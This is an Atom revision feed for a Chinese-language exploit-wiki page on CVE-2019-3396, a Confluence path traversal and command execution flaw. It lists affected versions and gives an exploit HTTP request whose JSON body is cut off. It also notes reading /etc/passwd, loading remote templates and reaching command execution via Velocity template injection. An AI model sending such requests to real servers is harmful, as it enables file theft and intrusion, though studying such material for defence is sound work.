<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-3396_Atlassian_Confluence_%E8%B7%AF%E5%BE%91%E7%A9%BF%E8%B6%8A%26%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-3396 Atlassian Confluence 路徑穿越&amp;命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-3396_Atlassian_Confluence_%E8%B7%AF%E5%BE%91%E7%A9%BF%E8%B6%8A%26%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-3396_Atlassian_Confluence_%E8%B7%AF%E5%BE%91%E7%A9%BF%E8%B6%8A%26%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T23:34:22Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-3396_Atlassian_Confluence_%E8%B7%AF%E5%BE%91%E7%A9%BF%E8%B6%8A%26%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2476&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==漏洞影響== &lt;pre&gt; 所有1.xx，2.xx，3.xx，4.xx和5.xx版本  所有6.0.x，6.1.x，6.2.x，6.3.x，6.4.x和6.5.x版本  6.6.12之前的所有6.6.x版本  所有6.7.x...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-3396_Atlassian_Confluence_%E8%B7%AF%E5%BE%91%E7%A9%BF%E8%B6%8A%26%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2476&amp;oldid=prev"/>
		<updated>2021-05-05T06:56:33Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==漏洞影響== &amp;lt;pre&amp;gt; 所有1.xx，2.xx，3.xx，4.xx和5.xx版本  所有6.0.x，6.1.x，6.2.x，6.3.x，6.4.x和6.5.x版本  6.6.12之前的所有6.6.x版本  所有6.7.x...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==漏洞影響==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
所有1.xx，2.xx，3.xx，4.xx和5.xx版本&lt;br /&gt;
&lt;br /&gt;
所有6.0.x，6.1.x，6.2.x，6.3.x，6.4.x和6.5.x版本&lt;br /&gt;
&lt;br /&gt;
6.6.12之前的所有6.6.x版本&lt;br /&gt;
&lt;br /&gt;
所有6.7.x，6.8.x，6.9.x，6.10.x和6.11.x版本&lt;br /&gt;
&lt;br /&gt;
6.12.3之前的所有6.12.x版本&lt;br /&gt;
&lt;br /&gt;
6.13.3之前的所有6.13.x版本&lt;br /&gt;
&lt;br /&gt;
6.14.2之前的所有6.14.x版本&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
發送如下數據包，即可讀取文件web.xml&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /rest/tinymce/1/macro/preview HTTP/1.1&lt;br /&gt;
Host: localhost:8090&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept: */*&lt;br /&gt;
Accept-Language: en&lt;br /&gt;
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&amp;amp;draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&amp;amp;&lt;br /&gt;
Content-Type: application/json; charset=utf-8&lt;br /&gt;
Content-Length: 176&lt;br /&gt;
&lt;br /&gt;
{&amp;quot;contentId&amp;quot;:&amp;quot;786458&amp;quot;,&amp;quot;macro&amp;quot;:{&amp;quot;name&amp;quot;:&amp;quot;widget&amp;quot;,&amp;quot;body&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;params&amp;quot;:{&amp;quot;url&amp;quot;:&amp;quot;https://www.viddler.com/v/23464dc6&amp;quot;,&amp;quot;w&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
6.12以前的Confluence沒有限製文件讀取的協議和路徑，我們可以使用file:///etc/passwd來讀取文件，也可以通過https://...來加載遠程文件。&lt;br /&gt;
&lt;br /&gt;
該文件是一個Velocity模板，我們可以通過模板注入（SSTI）來執行任意命令。&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>